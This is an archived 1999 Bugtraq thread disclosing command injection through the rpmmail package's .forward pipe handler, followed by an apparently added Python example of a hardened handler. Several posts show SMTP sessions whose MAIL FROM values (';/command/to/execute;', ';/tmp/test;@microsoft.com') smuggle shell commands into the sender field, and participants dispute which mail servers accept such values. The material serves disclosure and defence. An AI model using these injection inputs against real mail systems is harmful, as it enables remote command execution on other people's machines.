Bugtraq mailing list archives
Re: RH6.0 local/remote command execution
From: btellier () WEBLEY COM (Brock Tellier)
Date: Tue, 12 Oct 1999 09:46:46 -0500
Alright, this is getting a little silly. THIS IS NOT A HOLE IN SENDMAIL OR ANY OTHER MTA! AHH! PLEASE read the entire post before emailing me or this list about how it does or does not work! To review: This is a hole in the RPMMAIL PACKAGE! RPMMAIL sets up an account called rpmmail and a .forward file that executes /home/rpmmail/rpmmail by piping the message received from whatever MTA you use into it. Thus all we need is for the MTA to pipe a message to rpmmail that contains metacharacters in the From: field. That's it. The only discussion of MTAs is about whether Sendmail or Smail will allow from fields which do not contain the "@whatever.com" piece. Smail does not require this, Sendmail does. Period.

-Brock
OK, this is what I have done and it does not work on RedHat 6.0.

Script started on Tue Oct 12 10:17:23 1999
[root@blair /tmp]# uname -a
Linux blair.idefense.com 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686 unknown
[root@blair /tmp]# ls -l /tmp/test
-rwxr-xr-x   1 fiji     fiji           57 Oct 11 14:53 /tmp/test
[root@blair /tmp]# cat /tmp/test
#!/bin/sh
echo "you have been hacked" > /tmp/test.output
[root@blair /tmp]# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 blair.ipartnership.com ESMTP Sendmail 8.9.3/8.9.3; Tue, 12 Oct 1999 10:17:50 -0400
mail from: ;/tmp/test;@microsoft.com
250 ;/tmp/test;@microsoft.com... Sender ok
rcpt to: root
250 root... Recipient ok
data
354 Enter mail, end with "." on a line by itself
testing
.
250 KAA15029 Message accepted for delivery
quit
221 blair.ipartnership.com closing connection
Connection closed by foreign host.
[root@blair /tmp]# ls -l /tmp
total 817
drwx------   2 root     root         1024 Sep 21 10:53 orbit-root
-rw-rw-r--   1 root     root            0 Oct 12 10:17 output
-rwxr-xr-x   1 root     root        10240 Oct  7 14:15 sniffit.0.3.5.p1.tar
-rwxr-xr-x   1 root     root       819200 Oct  7 14:16 sniffit.0.3.5.tar
-rwxr-xr-x   1 fiji     fiji           57 Oct 11 14:53 test
[root@blair /tmp]#
Script done on Tue Oct 12 10:18:27 1999

As we can see there is no /tmp/test.output.

-Fiji

-----Original Message-----
From: Brock Tellier [mailto:btellier () WEBLEY COM]
Sent: Monday, October 11, 1999 12:02 PM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Re: RH6.0 local/remote command execution

There seems to be some confusion regarding this post. Let me try to explain. This post is titled "RH6.0 local/remote command execution" only because rpmmail is distributed on the RH6.0 Extra Applications CD. You can, of course, install rpmmail on any other linux variant, such as SuSE, which is what I did.
I believe I made this clear when I pasted:

bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)

In any case, as "D" pointed out,

MAIL FROM: ;/command/to/execute;
553 ;/command/to/execute;... Domain name required
MAIL FROM: ;/command/to/execute;@microsoft.com
250 ;/command/to/execute;@microsoft.com... Sender ok

should work on sendmail 8.9.3.

-Brock

That does not look like the MTA that comes with RH 6.0. That is smail, not sendmail. I tried this on my RH 6.0 install and it didn't work. Notice the "220 fear62 Smail-3.2". It's not sendmail.

-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ () SECURITYFOCUS COM] On Behalf Of Neezam Haniff
Sent: Wednesday, October 06, 1999 12:50 PM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: RH6.0 local/remote command execution

Hi,

Here are some comments below...

The remote exploit is merely:

bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500 (CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 <rpmmail> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit

I find this odd that this exploit could exist on a Red Hat 6.0 installation. sendmail 8.9.3 is the mailer that is installed and the way it's been configured, there's no way it would accept that sender address since it's not qualifiable. Please confirm this. This is what I get when I test this scenario on a Red Hat 6.0 system:

[nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 13:31:55 -0400
helo x.x
250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost[127.0.0.1], pleased to meet you
MAIL FROM: ;/command/to/execute;
553 ;/command/to/execute;... Domain name required

The only way someone could take advantage of this exploit is if their mailer configuration allows for the sender to be non-qualifiable.

Neezam.

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2
Comment: Encrypted Document from Infrastructure Defense, Inc.

iQA/AwUBOANEhIKtj2fJZe4vEQK+FwCbBKM5fYtsEAI3TCYnFEmxZXs0tQEAoLQw
Ho6rCei3wCD8Xfb3Q5+I7XSd
=8GsP
-----END PGP SIGNATURE-----
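The thread's point, that the bug lives in the .forward pipe handler rather than in the MTA, can be shown with a small model of such a handler. The following is an added example and is not rpmmail's code, nor anything posted by the people in this thread. It assumes a hypothetical handler that receives the message the MTA pipes to it and wants to reuse the sender address in a subprocess (the /usr/sbin/sendmail path is an assumption); the two sample messages are constructed, the first carrying the sender string from the thread. It reproduces the "domain name required" check that sendmail 8.9.3 applied, shows that this check alone does not stop a sender like ";/tmp/test;@microsoft.com", and demonstrates the two defences that do: rejecting shell metacharacters and passing the sender as a single argv element instead of a shell command line.

```python
# Added example, not rpmmail's code or anything from this thread.  Models a
# hypothetical .forward pipe handler that validates the sender it receives
# from the MTA and builds an argv list instead of a shell command line.
import email
import re

# Characters /bin/sh would act on if the sender were spliced into a command
# line; ';' is the one the thread relies on.
SHELL_META = set(";&|`$<>()\\\"' \t\n*?[]{}~!#")

# Shape of an address we are willing to hand to a subprocess: starts with an
# alphanumeric (so it can never be parsed as an option), then a local part,
# '@', and a dotted domain.
ADDR_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

# Constructed sample input: what an MTA would pipe into the handler.  The
# first carries the sender string from the thread, the second a normal one.
SAMPLE_EXPLOIT = (
    b"Return-Path: <;/tmp/test;@microsoft.com>\n"
    b"From: ;/tmp/test;@microsoft.com\n"
    b"To: rpmmail\n"
    b"Subject: testing\n"
    b"\n"
    b"testing\n"
)
SAMPLE_GOOD = (
    b"Return-Path: <alice@example.com>\n"
    b"From: Alice <alice@example.com>\n"
    b"To: rpmmail\n"
    b"Subject: rpm request\n"
    b"\n"
    b"please send foo.rpm\n"
)


def is_qualified(sender: str) -> bool:
    """The check sendmail 8.9.3 applied in the thread ("Domain name required"):
    the sender must carry an '@domain' part.  Note that it accepts
    ';/tmp/test;@microsoft.com', so it is not a defence on its own."""
    _local, sep, domain = sender.partition("@")
    return bool(sep) and bool(domain)


def has_shell_metachars(sender: str) -> bool:
    """True if the sender contains anything a shell would interpret."""
    return any(c in SHELL_META for c in sender)


def shell_would_run(cmdline: str) -> list:
    """Rough model of what /bin/sh does with ';' in a command line: it becomes
    several commands.  This is why splicing a sender into 'sendmail <sender>'
    is the dangerous pattern."""
    return [part.strip() for part in cmdline.split(";") if part.strip()]


def extract_sender(raw_message: bytes) -> str:
    """Sender as the pipe handler sees it: Return-Path (set by the MTA from
    MAIL FROM) if present, otherwise the From: header."""
    msg = email.message_from_bytes(raw_message)
    sender = msg.get("Return-Path") or msg.get("From") or ""
    return sender.strip().strip("<>")


def handle_piped_message(raw_message: bytes) -> dict:
    """Hardened handler: refuse suspicious senders, and return an argv list
    (to be run with subprocess.run(argv), shell=False) so the sender is one
    argument that no shell ever re-parses."""
    sender = extract_sender(raw_message)
    problems = []
    if not is_qualified(sender):
        problems.append("unqualified sender")
    if has_shell_metachars(sender):
        problems.append("shell metacharacters in sender")
    if not ADDR_RE.match(sender):
        problems.append("sender not in allowed address shape")
    if problems:
        return {"sender": sender, "accepted": False,
                "reason": ", ".join(problems), "argv": None}
    return {"sender": sender, "accepted": True, "reason": "",
            "argv": ["/usr/sbin/sendmail", sender]}  # path is an assumption


if __name__ == "__main__":
    unsafe = "/usr/sbin/sendmail " + extract_sender(SAMPLE_EXPLOIT)
    print("a shell given", repr(unsafe), "would run:", shell_would_run(unsafe))
    for raw in (SAMPLE_EXPLOIT, SAMPLE_GOOD):
        print(handle_piped_message(raw))
```

Running it prints the three commands a shell would make of the spliced command line, then a rejected decision for the first sample (the sender is "qualified" but fails the metacharacter and shape checks) and an accepted argv for the second. The shape check is deliberately narrower than what RFC 822 permits; a handler that needs to accept more exotic addresses should still keep the argv-list rule, since that is what removes the shell from the path entirely.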
Current thread:
- RH6.0 local/remote command execution Brock Tellier (Oct 04)
- <Possible follow-ups>
- Re: RH6.0 local/remote command execution Danny Crawford (Oct 08)
- Re: RH6.0 local/remote command execution Brock Tellier (Oct 11)
- Re: RH6.0 local/remote command execution Brock Tellier (Oct 12)